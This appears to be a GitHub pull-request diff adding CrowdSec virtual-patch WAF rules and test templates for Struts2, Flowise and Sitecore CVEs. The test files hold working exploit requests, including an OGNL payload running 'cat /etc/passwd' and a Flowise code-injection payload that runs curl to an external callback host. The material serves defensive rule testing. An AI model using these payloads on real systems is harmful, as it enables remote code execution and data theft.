Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
70 commits
Select commit Hold shift + click to select a range
25d4c83
Update blockers meta
actions-user Jun 11, 2026
e694494
Update blockers meta
actions-user Jun 12, 2026
d6eb941
Add vpatch-CVE-2024-8181 rule
crowdsec-automation Jun 12, 2026
8b94767
Add vpatch-CVE-2024-8181 test config
crowdsec-automation Jun 12, 2026
79533bb
Add CVE-2024-8181.yaml test
crowdsec-automation Jun 12, 2026
8cc6c6c
Add vpatch-CVE-2024-8181 rule to vpatch collection
crowdsec-automation Jun 12, 2026
1fbcb89
Add vpatch-CVE-2025-53693 rule
crowdsec-automation Jun 12, 2026
bd44b3b
Add vpatch-CVE-2025-53693 test config
crowdsec-automation Jun 12, 2026
2748a42
Add CVE-2025-53693.yaml test
crowdsec-automation Jun 12, 2026
8a8a02e
Add vpatch-CVE-2025-53693 rule to vpatch collection
crowdsec-automation Jun 12, 2026
5664fb5
Modify match condition in vpatch-CVE-2024-8181.yaml
he2ss Jun 12, 2026
ee964c1
Update vpatch-CVE-2024-8181.yaml
he2ss Jun 12, 2026
aa00d02
Merge pull request #41 from crowdsecurity/1781255703-vpatch-CVE-2024-…
he2ss Jun 12, 2026
7bb8361
Update index
actions-user Jun 12, 2026
5d1def8
Update taxonomy
actions-user Jun 12, 2026
86b4a77
Update blockers meta
actions-user Jun 12, 2026
0503705
Update blockers meta
actions-user Jun 13, 2026
3ccc972
Update blockers meta
actions-user Jun 13, 2026
ba16480
Update blockers meta
actions-user Jun 14, 2026
52e7027
Update blockers meta
actions-user Jun 14, 2026
54ef7ab
Update blockers meta
actions-user Jun 15, 2026
fdcc2d0
Update blockers meta
actions-user Jun 15, 2026
3e46e4c
Update blockers meta
actions-user Jun 16, 2026
b22a3b7
Update blockers meta
actions-user Jun 16, 2026
07f325c
Update blockers meta
actions-user Jun 17, 2026
38b677d
Add vpatch-CVE-2025-59528 rule
crowdsec-automation Jun 17, 2026
0b010e4
Add vpatch-CVE-2025-59528 test config
crowdsec-automation Jun 17, 2026
e47a223
Add CVE-2025-59528.yaml test
crowdsec-automation Jun 17, 2026
21e6249
Add vpatch-CVE-2025-59528 rule to vpatch collection
crowdsec-automation Jun 17, 2026
86c95fa
Update vpatch-CVE-2025-59528.yaml
buixor Jun 17, 2026
fc2f426
Merge pull request #44 from crowdsecurity/1781262568-vpatch-CVE-2025-…
buixor Jun 17, 2026
689d01e
Update index
actions-user Jun 17, 2026
84b4975
Update taxonomy
actions-user Jun 17, 2026
9b3e0a9
Merge pull request #48 from crowdsecurity/1781692446-vpatch-CVE-2025-…
buixor Jun 17, 2026
fc0a127
Update index
actions-user Jun 17, 2026
05afdb6
Update taxonomy
actions-user Jun 17, 2026
e5417c5
Merge branch 'crowdsecurity:master' into master
he2ss Jun 17, 2026
c7c3baa
Update blockers meta
actions-user Jun 17, 2026
9ff6d06
Update blockers meta
actions-user Jun 18, 2026
d4d900f
Update blockers meta
actions-user Jun 18, 2026
20bef69
Update blockers meta
actions-user Jun 19, 2026
481f50b
Update blockers meta
actions-user Jun 19, 2026
2aee4f6
Update blockers meta
actions-user Jun 20, 2026
cc72e42
Update blockers meta
actions-user Jun 20, 2026
aa5f977
Update blockers meta
actions-user Jun 21, 2026
a0ef44e
Update blockers meta
actions-user Jun 21, 2026
052e0b1
Update blockers meta
actions-user Jun 22, 2026
53c5d0c
Update blockers meta
actions-user Jun 22, 2026
ecda96a
Update blockers meta
actions-user Jun 23, 2026
0e6bc1f
Update blockers meta
actions-user Jun 23, 2026
dc77dd7
Update blockers meta
actions-user Jun 24, 2026
55bd40a
Update blockers meta
actions-user Jun 24, 2026
7c3b1ff
Update blockers meta
actions-user Jun 25, 2026
da52704
Update blockers meta
actions-user Jun 25, 2026
621e2fe
Update blockers meta
actions-user Jun 26, 2026
3cfd930
Merge remote-tracking branch 'hub/master'
Jun 26, 2026
df15df4
Update blockers meta
actions-user Jun 26, 2026
e0f5347
Update blockers meta
actions-user Jun 27, 2026
a6e17e3
Update blockers meta
actions-user Jun 27, 2026
7c12631
Update blockers meta
actions-user Jun 28, 2026
c345c79
Update blockers meta
actions-user Jun 28, 2026
a4cbc91
Update blockers meta
actions-user Jun 29, 2026
e0defc2
Update blockers meta
actions-user Jun 29, 2026
b1eb669
Update blockers meta
actions-user Jun 30, 2026
50d23b9
Update blockers meta
actions-user Jun 30, 2026
e452ba7
Update blockers meta
actions-user Jul 1, 2026
9ed6bb9
Add vpatch-CVE-2021-31805 rule
crowdsec-automation Jul 1, 2026
e762cb3
Add vpatch-CVE-2021-31805 test config
crowdsec-automation Jul 1, 2026
d70ec8c
Add CVE-2021-31805.yaml test
crowdsec-automation Jul 1, 2026
0d1dfa1
Add vpatch-CVE-2021-31805 rule to vpatch collection
crowdsec-automation Jul 1, 2026
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 37 additions & 0 deletions .appsec-tests/vpatch-CVE-2021-31805/CVE-2021-31805.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
## autogenerated on 2026-07-01 13:05:02
id: CVE-2021-31805
info:
name: CVE-2021-31805
author: crowdsec
severity: info
description: CVE-2021-31805 testing
tags: appsec-testing
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1095

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}

------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2021-31805/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-07-01 13:05:02
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-31805.yaml
nuclei_template: CVE-2021-31805.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-8181/CVE-2024-8181.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
## autogenerated on 2026-06-12 09:15:02
id: CVE-2024-8181
info:
name: CVE-2024-8181
author: crowdsec
severity: info
description: CVE-2024-8181 testing
tags: appsec-testing
http:
- raw:
- |
GET /api/v1/apikey?/api/v1/ping HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Referer: {{RootURL}}/document-stores
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-8181/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-06-12 09:15:02
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-8181.yaml
nuclei_template: CVE-2024-8181.yaml
21 changes: 21 additions & 0 deletions .appsec-tests/vpatch-CVE-2025-53693/CVE-2025-53693.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
## autogenerated on 2026-06-12 11:09:27
id: CVE-2025-53693
info:
name: CVE-2025-53693
author: crowdsec
severity: info
description: CVE-2025-53693 testing
tags: appsec-testing
http:
- raw:
- |
POST /-/xaml/Sitecore.Shell.Applications.Dialogs.ItemLister.ItemLister HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

__SOURCE=ItemLister&__PARAMETERS={"method":"AddToCache","parameters":["sitecore_cache_test_123456","<script>alert('CVE-2025-53693')</script>"]}
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2025-53693/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-06-12 11:09:27
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2025-53693.yaml
nuclei_template: CVE-2025-53693.yaml
22 changes: 22 additions & 0 deletions .appsec-tests/vpatch-CVE-2025-59528/CVE-2025-59528.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
## autogenerated on 2026-06-17 10:34:05
id: CVE-2025-59528
info:
name: CVE-2025-59528
author: crowdsec
severity: info
description: CVE-2025-59528 testing
tags: appsec-testing
http:
- raw:
- |
POST /api/v1/node-load-method/customMCP HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
x-request-from: internal

{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}}
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2025-59528/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-06-17 10:34:05
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml
nuclei_template: CVE-2025-59528.yaml
97 changes: 95 additions & 2 deletions .index.json

Large diffs are not rendered by default.

30 changes: 30 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2021-31805.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
## autogenerated on 2026-07-01 13:05:02
name: crowdsecurity/vpatch-CVE-2021-31805
description: 'Detects Apache Struts2 S2-062 remote code execution via forced OGNL evaluation in multipart form-data.'
rules:
- and:
- zones:
- RAW_BODY
transform:
- lowercase
match:
type: contains
value: '%{'
- zones:
- RAW_BODY
transform:
- lowercase
match:
type: contains
value: 'org.apache.tomcat.instancemanager'
labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'Apache Struts2 - RCE'
classification:
- cve.CVE-2021-31805
- attack.T1190
- cwe.CWE-917
25 changes: 25 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2024-8181.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
## autogenerated on 2026-06-12 09:15:02
name: crowdsecurity/vpatch-CVE-2024-8181
description: 'Detects authentication bypass in Flowise <= 1.8.2 by matching unauthorized access to sensitive API endpoints.'
rules:
- and:
- zones:
- URI_FULL
transform:
- lowercase
- urldecode
match:
type: contains
value: '/api/v1/apikey?/api/v1/ping'

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'Flowise - Authentication Bypass'
classification:
- cve.CVE-2024-8181
- attack.T1190
- cwe.CWE-287
35 changes: 35 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2025-53693.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
## autogenerated on 2026-06-12 11:09:27
name: crowdsecurity/vpatch-CVE-2025-53693
description: 'Detects Sitecore XAML AjaxScriptManager cache poisoning via AddToCache reflection method.'
rules:
- and:
- zones:
- URI
transform:
- lowercase
- urldecode
match:
type: contains
value: '/-/xaml/'
- zones:
- BODY_ARGS
variables:
- __parameters
transform:
- lowercase
- urldecode
match:
type: contains
value: 'addtocache'

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'Sitecore - Cache Poisoning'
classification:
- cve.CVE-2025-53693
- attack.T1190
- cwe.CWE-20
34 changes: 34 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
## autogenerated on 2026-06-17 10:34:05
name: crowdsecurity/vpatch-CVE-2025-59528
description: 'Detects Flowise CustomMCP node RCE via unsafe evaluation in convertToValidJSONString.'
rules:
- and:
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /api/v1/node-load-method/custommcp
- zones:
- BODY_ARGS
variables:
- json.inputs.mcpserverconfig
transform:
- lowercase
- urldecode
match:
type: contains
value: 'function('

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'Flowise - RCE'
classification:
- cve.CVE-2025-59528
- attack.T1190
- cwe.CWE-94
Loading
Loading